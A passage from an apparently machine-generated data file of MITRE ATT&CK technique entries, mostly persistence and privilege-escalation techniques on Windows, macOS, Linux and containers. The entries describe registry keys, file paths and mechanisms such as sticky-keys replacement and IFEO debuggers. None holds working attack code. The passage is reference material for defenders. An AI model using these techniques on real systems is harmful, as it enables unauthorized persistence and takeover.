               'description': 'Adversaries may create or modify Launch Daemons to execute malicious payloads as part '
                              'of persistence. Launch Daemons are plist files used to interact with Launchd, the '
                              'service management framework used by macOS. Launch Daemons require elevated privileges '
                              'to install, are executed for every user on a system prior to login, and run in the '
                              'background without the need for user interaction. During the macOS initialization '
                              'startup, the launchd process loads the parameters for launch-on-demand system-level '
                              'daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and '
                              '<code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a '
                              '<code>Label</code> to identify the task, <code>Program</code> to provide a path to the '
                              'executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons '
                              'are often used to provide access to shared resources, updates to software, or conduct '
                              'automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac '
                              'Malware Persistence)(Citation: launchd Keywords for plists)\n'
                              '\n'
                              'Adversaries may install a Launch Daemon configured to execute at startup by using the '
                              '<code>RunAtLoad</code> parameter set to <code>true</code> and the <code>Program</code> '
                              'parameter set to the malicious executable path. The daemon name may be disguised by '
                              'using a name from a related operating system or benign software (i.e. '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is '
                              'executed, the program inherits administrative permissions.(Citation: '
                              'WireLurker)(Citation: OSX Malware Detection)\n'
                              '\n'
                              'Additionally, system configuration changes (such as the installation of third party '
                              'package managing software) may cause folders such as <code>usr/local/bin</code> to '
                              'become globally writeable. So, it is possible for poor configurations to allow an '
                              "adversary to modify executables referenced by current Launch Daemon's plist "
                              'files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)',
               'name': 'Launch Daemon',
               'platforms': ['macOS']},
 'T1543.005': {'attack_id': 'T1543.005',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may create or modify container or container cluster management tools that '
                              'run as daemons, agents, or services on individual hosts. These include software for '
                              'creating and managing individual containers, such as Docker and Podman, as well as '
                              'container cluster node-level agents such as kubelet. By modifying these services, an '
                              'adversary may be able to achieve persistence or escalate their privileges on a host.\n'
                              '\n'
                              'For example, by using the `docker run` or `podman run` command with the '
                              '`restart=always` directive, a container can be configured to persistently restart on '
                              'the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker '
                              'command may also be able to escalate their privileges on the host.(Citation: GTFOBins '
                              'Docker)\n'
                              '\n'
                              'In Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy '
                              'Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones '
                              'added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: '
                              'Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the '
                              '`nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning '
                              'Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020)\n'
                              '\n'
                              'Note that containers can also be configured to run as [Systemd '
                              'Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman '
                              'Systemd)(Citation: Docker Systemd)',
               'name': 'Container Service',
               'platforms': ['Containers']},
 'T1544': {'attack_id': 'T1544',
           'categories': ['command-and-control'],
           'description': 'Adversaries may transfer tools or other files from an external system onto a compromised '
                          'device to facilitate follow-on actions. Files may be copied from an external '
                          'adversary-controlled system through the command and control channel  or through alternate '
                          'protocols with another tool such as FTP.',
           'name': 'Ingress Tool Transfer',
           'platforms': ['Android', 'iOS']},
 'T1546': {'attack_id': 'T1546',
           'categories': ['privilege-escalation', 'persistence'],
           'description': 'Adversaries may establish persistence and/or elevate privileges using system mechanisms '
                          'that trigger execution based on specific events. Various operating systems have means to '
                          'monitor and subscribe to events such as logons or other user activity such as running '
                          'specific applications/binaries. Cloud environments may also support various functions and '
                          'services that monitor and can be invoked in response to specific cloud events.(Citation: '
                          'Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: '
                          'Microsoft DART Case Report 001)\n'
                          '\n'
                          'Adversaries may abuse these mechanisms as a means of maintaining persistent access to a '
                          'victim via repeatedly executing malicious code. After gaining access to a victim system, '
                          'adversaries may create/modify event triggers to point to malicious content that will be '
                          'executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: '
                          'Malware Persistence on OS X)(Citation: amnesia malware)\n'
                          '\n'
                          'Since the execution can be proxied by an account with higher permissions, such as SYSTEM or '
                          'service accounts, an adversary may be able to abuse these triggered execution mechanisms to '
                          'escalate their privileges. ',
           'name': 'Event Triggered Execution',
           'platforms': ['Linux', 'macOS', 'Windows', 'SaaS', 'IaaS', 'Office 365']},
 'T1546.001': {'attack_id': 'T1546.001',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by a '
                              'file type association. When a file is opened, the default program used to open the file '
                              '(also called the file association or handler) is checked. File association selections '
                              'are stored in the Windows Registry and can be edited by users, administrators, or '
                              'programs that have Registry access or by administrators using the built-in assoc '
                              'utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File '
                              'Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file '
                              'association for a given file extension to call an arbitrary program when a file with '
                              'the given extension is opened.\n'
                              '\n'
                              'System file associations are listed under <code>HKEY_CLASSES_ROOT\\.[extension]</code>, '
                              'for example <code>HKEY_CLASSES_ROOT\\.txt</code>. The entries point to a handler for '
                              'that extension located at <code>HKEY_CLASSES_ROOT\\\\[handler]</code>. The various '
                              'commands are then listed as subkeys underneath the shell key at '
                              '<code>HKEY_CLASSES_ROOT\\\\[handler]\\shell\\\\[action]\\command</code>. For example: \n'
                              '\n'
                              '* <code>HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command</code>\n'
                              '* <code>HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command</code>\n'
                              '* <code>HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command</code>\n'
                              '\n'
                              'The values of the keys listed are commands that are executed when the handler opens the '
                              'file extension. Adversaries can modify these values to continually execute arbitrary '
                              'commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)',
               'name': 'Change Default File Association',
               'platforms': ['Windows']},
 'T1546.002': {'attack_id': 'T1546.002',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by user '
                              'inactivity. Screensavers are programs that execute after a configurable time of user '
                              'inactivity and consist of Portable Executable (PE) files with a .scr file '
                              'extension.(Citation: Wikipedia Screensaver) The Windows screensaver application '
                              'scrnsave.scr is located in <code>C:\\Windows\\System32\\</code>, and '
                              '<code>C:\\Windows\\sysWOW64\\</code>  on 64-bit Windows systems, along with '
                              'screensavers included with base Windows installations.\n'
                              '\n'
                              'The following screensaver settings are stored in the Registry (<code>HKCU\\Control '
                              'Panel\\Desktop\\</code>) and could be manipulated to achieve persistence:\n'
                              '\n'
                              '* <code>SCRNSAVE.exe</code> - set to malicious PE path\n'
                              "* <code>ScreenSaveActive</code> - set to '1' to enable the screensaver\n"
                              "* <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock\n"
                              '* <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is '
                              'executed\n'
                              '\n'
                              'Adversaries can use screensaver settings to maintain persistence by setting the '
                              'screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET '
                              'Gazer Aug 2017)',
               'name': 'Screensaver',
               'platforms': ['Windows']},
 'T1546.003': {'attack_id': 'T1546.003',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and elevate privileges by executing malicious '
                              'content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI '
                              'can be used to install event filters, providers, consumers, and bindings that execute '
                              'code when a defined event occurs. Examples of events that may be subscribed to are the '
                              "wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends "
                              '2015)\n'
                              '\n'
                              'Adversaries may use the capabilities of WMI to subscribe to an event and execute '
                              'arbitrary code when that event occurs, providing persistence on a system.(Citation: '
                              'FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI '
                              'scripts – using `mofcomp.exe`  –into Windows Management Object (MOF) files (.mof '
                              'extension) that can be used to create a malicious subscription.(Citation: Dell WMI '
                              'Persistence)(Citation: Microsoft MOF May 2018)\n'
                              '\n'
                              'WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) '
                              'and thus may result in elevated SYSTEM privileges.',
               'name': 'Windows Management Instrumentation Event Subscription',
               'platforms': ['Windows']},
 'T1546.004': {'attack_id': 'T1546.004',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence through executing malicious commands triggered by '
                              'a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s '
                              'execute several configuration scripts at different points throughout the session based '
                              'on events. For example, when a user opens a command-line interface or remotely logs in '
                              '(such as via SSH) a login shell is initiated. The login shell executes scripts from the '
                              'system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure '
                              'the environment. All login shells on a system use /etc/profile when initiated. These '
                              'configuration scripts run at the permission level of their directory and are often used '
                              'to set environment variables, create aliases, and customize the user’s environment. '
                              'When the shell exits or terminates, additional shell scripts are executed to ensure the '
                              'shell exits appropriately. \n'
                              '\n'
                              'Adversaries may attempt to establish persistence by inserting commands into scripts '
                              'automatically executed by shells. Using bash as an example, the default shell for most '
                              'GNU/Linux systems, adversaries may add commands that launch malicious binaries into the '
                              '<code>/etc/profile</code> and <code>/etc/profile.d</code> files.(Citation: '
                              'intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require '
                              'root permissions to modify and are executed each time any shell on a system launches. '
                              'For user level permissions, adversaries can insert malicious commands into '
                              '<code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> '
                              'which are sourced when a user opens a command-line interface or connects '
                              'remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) '
                              'Since the system only executes the first existing file in the listed order, adversaries '
                              'have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also '
                              'leveraged the <code>~/.bashrc</code> file which is additionally executed if the '
                              'connection is established remotely or an additional interactive shell is opened, such '
                              'as a new tab in the command-line interface.(Citation: Tsunami)(Citation: '
                              'anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware '
                              'targets the termination of a program to trigger execution, adversaries can use the '
                              '<code>~/.bash_logout</code> file to execute malicious commands at the end of a '
                              'session. \n'
                              '\n'
                              'For macOS, the functionality of this technique is similar but may leverage zsh, the '
                              'default shell for macOS 10.15+. When the Terminal.app is opened, the application '
                              'launches a zsh login shell and a zsh interactive shell. The login shell configures the '
                              'system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, '
                              '<code>/etc/zprofile</code>, and <code>/etc/zlogin</code>.(Citation: ScriptingOSX '
                              'zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS '
                              'MS office sandbox escape) The login shell then configures the user environment with '
                              '<code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the '
                              '<code>~/.zshrc</code> to configure the user environment. Upon exiting, '
                              '<code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy '
                              'programs, macOS executes <code>/etc/bashrc</code> on startup.',
               'name': 'Unix Shell Configuration Modification',
               'platforms': ['Linux', 'macOS']},
 'T1546.005': {'attack_id': 'T1546.005',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by an '
                              'interrupt signal. The <code>trap</code> command allows programs and shells to specify '
                              'commands that will be executed upon receiving interrupt signals. A common situation is '
                              'a script allowing for graceful termination and handling of common keyboard interrupts '
                              'like <code>ctrl+c</code> and <code>ctrl+d</code>.\n'
                              '\n'
                              'Adversaries can use this to register code to be executed when the shell encounters '
                              'specific interrupts as a persistence mechanism. Trap commands are of the following '
                              'format <code>trap \'command list\' signals</code> where "command list" will be executed '
                              'when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap '
                              'Statements)',
               'name': 'Trap',
               'platforms': ['macOS', 'Linux']},
 'T1546.006': {'attack_id': 'T1546.006',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by the '
                              'execution of tainted binaries. Mach-O binaries have a series of headers that are used '
                              'to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a '
                              'Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during '
                              'execution time. These can be added ad-hoc to the compiled binary as long as adjustments '
                              'are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for '
                              'OSX) There are tools available to perform these changes.\n'
                              '\n'
                              'Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every '
                              'time the binary is executed. Although any changes will invalidate digital signatures on '
                              'binaries because the binary is being modified, this can be remediated by simply '
                              'removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t '
                              'checked at load time.(Citation: Malware Persistence on OS X)',
               'name': 'LC_LOAD_DYLIB Addition',
               'platforms': ['macOS']},
 'T1546.007': {'attack_id': 'T1546.007',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by Netsh '
                              'Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting '
                              'utility used to interact with the network configuration of a system. It contains '
                              'functionality to add helper DLLs for extending functionality of the utility.(Citation: '
                              'TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the '
                              'Windows Registry at <code>HKLM\\SOFTWARE\\Microsoft\\Netsh</code>.\n'
                              '\n'
                              'Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a '
                              'persistent manner. This execution would take place anytime netsh.exe is executed, which '
                              'could happen automatically, with another persistence technique, or if other software '
                              '(ex: VPN) is present on the system that executes netsh.exe as part of its normal '
                              'functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh '
                              'Persistence)',
               'name': 'Netsh Helper DLL',
               'platforms': ['Windows']},
 'T1546.008': {'attack_id': 'T1546.008',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by accessibility features. Windows contains accessibility features '
                              'that may be launched with a key combination before a user has logged in (ex: when the '
                              'user is on the Windows logon screen). An adversary can modify the way these programs '
                              'are launched to get a command prompt or backdoor without logging in to the system.\n'
                              '\n'
                              'Two common accessibility programs are <code>C:\\Windows\\System32\\sethc.exe</code>, '
                              'launched when the shift key is pressed five times and '
                              '<code>C:\\Windows\\System32\\utilman.exe</code>, launched when the Windows + U key '
                              'combination is pressed. The sethc.exe program is often referred to as "sticky keys", '
                              'and has been used by adversaries for unauthenticated access through a remote desktop '
                              'login screen. (Citation: FireEye Hikit Rootkit)\n'
                              '\n'
                              'Depending on the version of Windows, an adversary may take advantage of these features '
                              'in different ways. Common methods used by adversaries include replacing accessibility '
                              'feature binaries or pointers/references to these binaries in the Registry. In newer '
                              'versions of Windows, the replaced binary needs to be digitally signed for x64 systems, '
                              'the binary must reside in <code>%systemdir%\\</code>, and it must be protected by '
                              'Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The '
                              '[Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) '
                              'debugger method was likely discovered as a potential workaround because it does not '
                              'require the corresponding accessibility feature binary to be replaced.\n'
                              '\n'
                              'For simple binary replacement on Windows XP and later as well as and Windows Server '
                              '2003/R2 and later, for example, the program (e.g., '
                              '<code>C:\\Windows\\System32\\utilman.exe</code>) may be replaced with "cmd.exe" (or '
                              'another program that provides backdoor access). Subsequently, pressing the appropriate '
                              'key combination at the login screen while sitting at the keyboard or when connected '
                              'over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will '
                              'cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury '
                              '2014)\n'
                              '\n'
                              'Other accessibility features exist that may also be leveraged in a similar fashion: '
                              '(Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n'
                              '\n'
                              '* On-Screen Keyboard: <code>C:\\Windows\\System32\\osk.exe</code>\n'
                              '* Magnifier: <code>C:\\Windows\\System32\\Magnify.exe</code>\n'
                              '* Narrator: <code>C:\\Windows\\System32\\Narrator.exe</code>\n'
                              '* Display Switcher: <code>C:\\Windows\\System32\\DisplaySwitch.exe</code>\n'
                              '* App Switcher: <code>C:\\Windows\\System32\\AtBroker.exe</code>',
               'name': 'Accessibility Features',
               'platforms': ['Windows']},
 'T1546.009': {'attack_id': 'T1546.009',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) '
                              'that are specified in the <code>AppCertDLLs</code> Registry key under '
                              '<code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\</code> '
                              'are loaded into every process that calls the ubiquitously used application programming '
                              'interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, '
                              '<code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or '
                              '<code>WinExec</code>. (Citation: Elastic Process Injection July 2017)\n'
                              '\n'
                              'Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value '
                              'can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and '
                              'run in the context of separate processes on the computer. Malicious AppCert DLLs may '
                              'also provide persistence by continuously being triggered by API activity. ',
               'name': 'AppCert DLLs',
               'platforms': ['Windows']},
 'T1546.010': {'attack_id': 'T1546.010',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) '
                              'that are specified in the <code>AppInit_DLLs</code> value in the Registry keys '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Windows</code> or '
                              '<code>HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Windows</code> are loaded by user32.dll into every process that '
                              'loads user32.dll. In practice this is nearly every program, since user32.dll is a very '
                              'common library. (Citation: Elastic Process Injection July 2017)\n'
                              '\n'
                              'Similar to Process Injection, these values can be abused to obtain elevated privileges '
                              'by causing a malicious DLL to be loaded and run in the context of separate processes on '
                              'the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide '
                              'persistence by continuously being triggered by API activity. \n'
                              '\n'
                              'The AppInit DLL functionality is disabled in Windows 8 and later versions when secure '
                              'boot is enabled. (Citation: AppInit Secure Boot)',
               'name': 'AppInit DLLs',
               'platforms': ['Windows']},
 'T1546.011': {'attack_id': 'T1546.011',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by application shims. The Microsoft Windows Application Compatibility '
                              'Infrastructure/Framework (Application Shim) was created to allow for backward '
                              'compatibility of software as the operating system codebase changes over time. For '
                              'example, the application shimming feature allows developers to apply fixes to '
                              'applications (without rewriting code) that were created for Windows XP so that it will '
                              'work with Windows 10. (Citation: Elastic Process Injection July 2017)\n'
                              '\n'
                              'Within the framework, shims are created to act as a buffer between the program (or more '
                              'specifically, the Import Address Table) and the Windows OS. When a program is executed, '
                              'the shim cache is referenced to determine if the program requires the use of the shim '
                              'database (.sdb). If so, the shim database uses hooking to redirect the code as '
                              'necessary in order to communicate with the OS. \n'
                              '\n'
                              'A list of all shims currently installed by the default Windows installer (sdbinst.exe) '
                              'is kept in:\n'
                              '\n'
                              '* <code>%WINDIR%\\AppPatch\\sysmain.sdb</code> and\n'
                              '* <code>hklm\\software\\microsoft\\windows '
                              'nt\\currentversion\\appcompatflags\\installedsdb</code>\n'
                              '\n'
                              'Custom databases are stored in:\n'
                              '\n'
                              '* <code>%WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom</code> and\n'
                              '* <code>hklm\\software\\microsoft\\windows '
                              'nt\\currentversion\\appcompatflags\\custom</code>\n'
                              '\n'
                              'To keep shims secure, Windows designed them to run in user mode so they cannot modify '
                              'the kernel and you must have administrator privileges to install a shim. However, '
                              'certain shims can be used to [Bypass User Account '
                              'Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject '
                              'DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and '
                              'Structure Exception Handling (DisableSEH), and intercept memory addresses '
                              '(GetProcAddress).\n'
                              '\n'
                              'Utilizing these shims may allow an adversary to perform several malicious acts such as '
                              'elevate privileges, install backdoors, disable defenses like Windows Defender, etc. '
                              '(Citation: FireEye Application Shimming) Shims can also be abused to establish '
                              'persistence by continuously being invoked by affected programs.',
               'name': 'Application Shimming',
               'platforms': ['Windows']},
 'T1546.012': {'attack_id': 'T1546.012',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and/or elevate privileges by executing malicious '
                              'content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a '
                              'developer to attach a debugger to an application. When a process is created, a debugger '
                              'present in an application’s IFEO will be prepended to the application’s name, '
                              'effectively launching the new process under the debugger (e.g., <code>C:\\dbg\\ntsd.exe '
                              '-g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)\n'
                              '\n'
                              'IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. '
                              '(Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> '
                              'values in the Registry under <code>HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\Image File Execution Options\\<executable></code> where '
                              '<code>&lt;executable&gt;</code> is the binary on which the debugger is attached. '
                              '(Citation: Microsoft Dev Blog IFEO Mar 2010)\n'
                              '\n'
                              'IFEOs can also enable an arbitrary monitor program to be launched when a specified '
                              'program silently exits (i.e. is prematurely terminated by itself or a second, non '
                              'kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: '
                              'Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled '
                              'through GFlags and/or by directly modifying IFEO and silent process exit Registry '
                              'values in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows '
                              'NT\\CurrentVersion\\SilentProcessExit\\</code>. (Citation: Microsoft Silent Process '
                              'Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)\n'
                              '\n'
                              'Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on '
                              'Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be '
                              'modified that configures "cmd.exe," or another program that provides backdoor access, '
                              'as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is '
                              'modified, pressing the appropriate key combination at the login screen while at the '
                              'keyboard or when connected with [Remote Desktop '
                              'Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" '
                              'program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n'
                              '\n'
                              'Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values '
                              'may also be abused to obtain privilege escalation by causing a malicious executable to '
                              'be loaded and run in the context of separate processes on the computer. (Citation: '
                              'Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide '
                              'Persistence via continuous triggered invocation.\n'
                              '\n'
                              'Malware may also use IFEO to [Impair '
                              'Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers '
                              'that redirect and effectively disable various system and security applications. '
                              '(Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)',
               'name': 'Image File Execution Options Injection',
               'platforms': ['Windows']},
 'T1546.013': {'attack_id': 'T1546.013',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may gain persistence and elevate privileges by executing malicious content '
                              'triggered by PowerShell profiles. A PowerShell profile  (<code>profile.ps1</code>) is a '
                              'script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) '
                              'starts and can be used as a logon script to customize user environments.\n'
                              '\n'
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles '
                              'depending on the user or host program. For example, there can be different profiles for '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the '
                              'PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also '
                              'configure a profile that applies to all users and host programs on the local computer. '
                              '(Citation: Microsoft About Profiles) \n'
                              '\n'
                              'Adversaries may modify these profiles to include arbitrary commands, functions, '
                              'modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to '
                              'gain persistence. Every time a user opens a '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script '
                              'will be executed unless the <code>-NoProfile</code> flag is used when it is launched. '
                              '(Citation: ESET Turla PowerShell May 2019) \n'
                              '\n'
                              'An adversary may also be able to escalate privileges if a script in a PowerShell '
                              'profile is loaded and executed by an account with higher privileges, such as a domain '
                              'administrator. (Citation: Wits End and Shady PowerShell Profiles)',
               'name': 'PowerShell Profile',
               'platforms': ['Windows']},
 'T1546.014': {'attack_id': 'T1546.014',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may gain persistence and elevate privileges by executing malicious content '
                              'triggered by the Event Monitor Daemon (emond). Emond is a [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various '
                              'services, runs them through a simple rules engine, and takes action. The emond binary '
                              'at <code>/sbin/emond</code> will load any rules from the '
                              '<code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined '
                              'event takes place.\n'
                              '\n'
                              'The rule files are in the plist format and define the name, event type, and action to '
                              'take. Some examples of event types include system startup and user authentication. '
                              'Examples of actions are to run a system command or send an email. The emond service '
                              'will not launch if there is no file present in the QueueDirectories path '
                              '<code>/private/var/db/emondClients</code>, specified in the [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file '
                              'at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior '
                              'emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos '
                              'persist Jun 2019)\n'
                              '\n'
                              'Adversaries may abuse this service by writing a rule to execute commands when a defined '
                              'event occurs, such as system start up or user authentication.(Citation: xorrior emond '
                              'Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun '
                              '2019) Adversaries may also be able to escalate privileges from administrator to root as '
                              'the emond service is executed with root privileges by the [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004) service.',
               'name': 'Emond',
               'platforms': ['macOS']},
 'T1546.015': {'attack_id': 'T1546.015',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence by executing malicious content triggered by '
                              'hijacked references to Component Object Model (COM) objects. COM is a system within '
                              'Windows to enable interaction between software components through the operating '
                              'system.(Citation: Microsoft Component Object Model)  References to various COM objects '
                              'are stored in the Registry. \n'
                              '\n'
                              'Adversaries can use the COM system to insert malicious code that can be executed in '
                              'place of legitimate software through hijacking the COM references and relationships as '
                              'a means for persistence. Hijacking a COM object requires a change in the Registry to '
                              'replace a reference to a legitimate system component which may cause that component to '
                              'not work when executed. When that system component is executed through normal system '
                              "operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) "
                              'An adversary is likely to hijack objects that are used frequently enough to maintain a '
                              'consistent level of persistence, but are unlikely to break noticeable functionality '
                              'within the system as to avoid system instability that could lead to detection. ',
               'name': 'Component Object Model Hijacking',
               'platforms': ['Windows']},
 'T1546.016': {'attack_id': 'T1546.016',
               'categories': ['privilege-escalation', 'persistence'],
               'description': 'Adversaries may establish persistence and elevate privileges by using an installer to '
                              'trigger the execution of malicious content. Installer packages are OS specific and '
                              'contain the resources an operating system needs to install applications on a system. '
                              'Installer packages can include scripts that run prior to installation as well as after '
                              'installation is complete. Installer scripts may inherit elevated permissions when '
                              'executed. Developers often use these scripts to prepare the environment for '
                              'installation, check requirements, download dependencies, and remove files after '
                              'installation.(Citation: Installer Package Scripting Rich Trouton)\n'
                              '\n'
                              'Using legitimate applications, adversaries have distributed applications with modified '
                              'installer scripts to execute malicious content. When a user installs the application, '
                              'they may be required to grant administrative permissions to allow the installation. At '
                              'the end of the installation process of the legitimate application, content such as '
                              'macOS `postinstall` scripts can be executed with the inherited elevated permissions. '
                              'Adversaries can use these scripts to execute a malicious executable or install other '
                              'malicious components (such as a [Launch '
                              'Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated '
                              'permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle '
                              'evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer '
                              'Scripts)\n'
                              '\n'
                              'Depending on the distribution, Linux versions of package installer scripts are '
                              'sometimes called maintainer scripts or post installation scripts. These scripts can '
                              'include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when '
                              'executed.\n'
                              '\n'
                              'For Windows, the Microsoft Installer services uses `.msi` files to manage the '
                              'installing, updating, and uninstalling of applications. These installation routines may '
                              'also include instructions to perform additional actions that may be abused by '
                              'adversaries.(Citation: Microsoft Installation Procedures)',
               'name': 'Installer Packages',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1547': {'attack_id': 'T1547',
           'categories': ['persistence', 'privilege-escalation'],
           'description': 'Adversaries may configure system settings to automatically execute a program during system '
                          'boot or logon to maintain persistence or gain higher-level privileges on compromised '
                          'systems. Operating systems may have mechanisms for automatically running a program on '
                          'system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication '
                          'Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept '
                          '2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically '
                          'executing programs that are placed in specially designated directories or are referenced by '
